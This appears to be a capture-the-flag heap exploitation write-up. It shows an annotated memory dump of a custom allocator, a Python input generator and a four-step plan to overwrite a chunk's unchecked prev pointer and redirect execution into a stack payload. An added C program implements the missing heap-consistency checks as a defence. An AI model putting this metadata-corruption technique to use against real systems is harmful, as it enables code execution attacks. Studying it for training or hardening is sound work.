Hash Table, plus one full box:

         0 1  2 3  4 5  6 7  8 9  a b  c d  e f
5000:[0050 1050 1500]0b00 0300 0500 1650 2c50  .P.P.........P,P
5010:[0050 2650 2100]4250 a250 0251 6251 c251  .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252[1050 3c50 2100]0b00 0000  "R.R.R.P<P!.....

Hash Table fields:
  04: 0005: Parameter 2 (Rightshift?)
  06: 5016: & Box Pointer List
  08: 502c: & Per-box User Count List

Box Pointer List:
  Box list header metadata @ 5010: 0050 2650 2100  [ Prev: 5000, Next: 5026, Size: 0010 ]
  Data: 4250 a250 0251 6251 c251 2252 8252 e252
    00: 5042 & Box 0
    02: 50a2 & Box 1
    04: 5102 & Box 2
    06: 5162 & Box 3
    08: 51c2 & Box 4
    0a: 5222 & Box 5
    0c: 5282 & Box 6
    0e: 52e2 & Box 7

Other Data Section (?):
  Section header metadata @ 5026: 1050 3c50 2100  [ Prev: 5010, Next: 503c, Size: 0010 ]
  Data: 0a00 0000 0000 0000 0000 0000 0000 0000

Python one-liner used to build the input that fills the boxes:

    # emit one "new <name> ;" command per entry, all on a single line
    for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
        print(f'new {c} ;', end="")

Malloc:
  - Checks to make sure next pointer is always ASCENDING
  - Does not check prev pointer!!!!

The Exploit:
  - Overwrite the prev pointer of a block so that it points to ~ the return address on stack
  - Overwrite the size parameter so that, when added to the return address, it places pc somewhere nice
  - Place pc into a payload on the stack
  - INT 0x7f
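The "Malloc:" notes say the target's allocator only checks that the next pointer ascends and never validates prev, which is the gap the rest of the notes rely on. The C program below is an added example, not code from the notes or from the target: it models the 6-byte chunk header visible in the dump (prev, next, size as little-endian 16-bit words; the size word is assumed to hold the byte length shifted left by one with an in-use bit in bit 0, which is how 0x0021 decodes to the "Size: 0010" given above), lays out the headers from the dump plus one box header inferred from the Box 0 / Box 1 addresses, and runs the consistency checks a hardened allocator would apply before trusting a header: both neighbours must link back, the neighbours must be ordered, and header + size must land exactly on next. The names check_chunk, build_heap_from_dump and the status enum are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Simulated 16-bit address space like the target's; every "address" below
 * is an offset into this array. */
#define MEM_SIZE 0x10000u
static uint8_t mem[MEM_SIZE];

/* Chunk header as seen in the dump: prev, next, size (three little-endian
 * 16-bit words, 6 bytes).  Assumption: size word = (byte length << 1) | in_use. */
#define HDR_LEN 6u

static uint16_t rd16(uint16_t addr) {
    return (uint16_t)(mem[addr] | (mem[(uint16_t)(addr + 1)] << 8));
}
static void wr16(uint16_t addr, uint16_t v) {
    mem[addr] = (uint8_t)(v & 0xff);
    mem[(uint16_t)(addr + 1)] = (uint8_t)(v >> 8);
}

enum chunk_status {
    CHUNK_OK = 0,
    CHUNK_BAD_NEXT_ORDER,    /* next does not lie above this chunk           */
    CHUNK_BAD_NEXT_BACKLINK, /* next->prev does not point back to this chunk */
    CHUNK_BAD_SIZE,          /* header + payload does not reach next         */
    CHUNK_BAD_PREV_ORDER,    /* prev does not lie below this chunk           */
    CHUNK_BAD_PREV_FORWARD   /* prev->next does not point to this chunk      */
};

/* The checks the notes say the target's malloc lacks.  The "next is
 * ascending" test is kept; on top of it both neighbours must agree with us
 * (the classic safe-unlink test) and the size must match the gap to next.
 * head_addr is the first chunk of the list, whose prev points to itself. */
enum chunk_status check_chunk(uint16_t addr, uint16_t head_addr) {
    uint16_t prev = rd16(addr);
    uint16_t next = rd16((uint16_t)(addr + 2));
    uint16_t size = rd16((uint16_t)(addr + 4)) >> 1;   /* strip in-use bit */

    if (next <= addr)
        return CHUNK_BAD_NEXT_ORDER;
    if (rd16(next) != addr)
        return CHUNK_BAD_NEXT_BACKLINK;
    if ((uint32_t)addr + HDR_LEN + size != next)
        return CHUNK_BAD_SIZE;
    if (addr == head_addr)
        return prev == addr ? CHUNK_OK : CHUNK_BAD_PREV_FORWARD;
    if (prev >= addr)
        return CHUNK_BAD_PREV_ORDER;
    if (rd16((uint16_t)(prev + 2)) != addr)
        return CHUNK_BAD_PREV_FORWARD;
    return CHUNK_OK;
}

/* Constructed heap: the three headers from the dump (0x5000, 0x5010, 0x5026)
 * plus the header at 0x503c, whose size is inferred from the 0x60 stride
 * between Box 0 (0x5042) and Box 1 (0x50a2). */
void build_heap_from_dump(void) {
    memset(mem, 0, sizeof mem);
    wr16(0x5000, 0x5000); wr16(0x5002, 0x5010); wr16(0x5004, 0x0015); /* hash table, 0x0a bytes     */
    wr16(0x5010, 0x5000); wr16(0x5012, 0x5026); wr16(0x5014, 0x0021); /* box pointer list, 0x10    */
    wr16(0x5026, 0x5010); wr16(0x5028, 0x503c); wr16(0x502a, 0x0021); /* per-box user counts, 0x10 */
    wr16(0x503c, 0x5026); wr16(0x503e, 0x509c); wr16(0x5040, 0x00b5); /* box 0, 0x5a (inferred)    */
    wr16(0x509c, 0x503c);                                             /* back-link of the next chunk */
}

/* 1 if every chunk from the dump passes on the intact heap. */
int all_dump_chunks_ok(void) {
    static const uint16_t chunks[] = {0x5000, 0x5010, 0x5026, 0x503c};
    build_heap_from_dump();
    for (size_t i = 0; i < sizeof chunks / sizeof chunks[0]; i++)
        if (check_chunk(chunks[i], 0x5000) != CHUNK_OK)
            return 0;
    return 1;
}

/* A prev pointer rewritten to a value off the list (constructed corruption)
 * still has a valid-looking next, so an "ascending next" check alone would
 * accept it; the back-link test rejects it. */
enum chunk_status forged_prev_status(void) {
    build_heap_from_dump();
    wr16(0x5010, 0x4000);
    return check_chunk(0x5010, 0x5000);
}

/* A size word that no longer matches the gap to next is caught as well. */
enum chunk_status forged_size_status(void) {
    build_heap_from_dump();
    wr16(0x5014, 0x0041);   /* claims 0x20 bytes, but next is only 0x10 away */
    return check_chunk(0x5010, 0x5000);
}

int main(void) {
    printf("intact heap: %s\n", all_dump_chunks_ok() ? "all chunks consistent" : "inconsistent");
    printf("forged prev: status %d\n", (int)forged_prev_status());
    printf("forged size: status %d\n", (int)forged_size_status());
    return 0;
}
```

The point of the example is the ordering of the checks: the back-link test on prev costs one extra memory read per operation and turns the silent metadata overwrite the notes describe into a detectable abort before the corrupted pointer is ever dereferenced for a write.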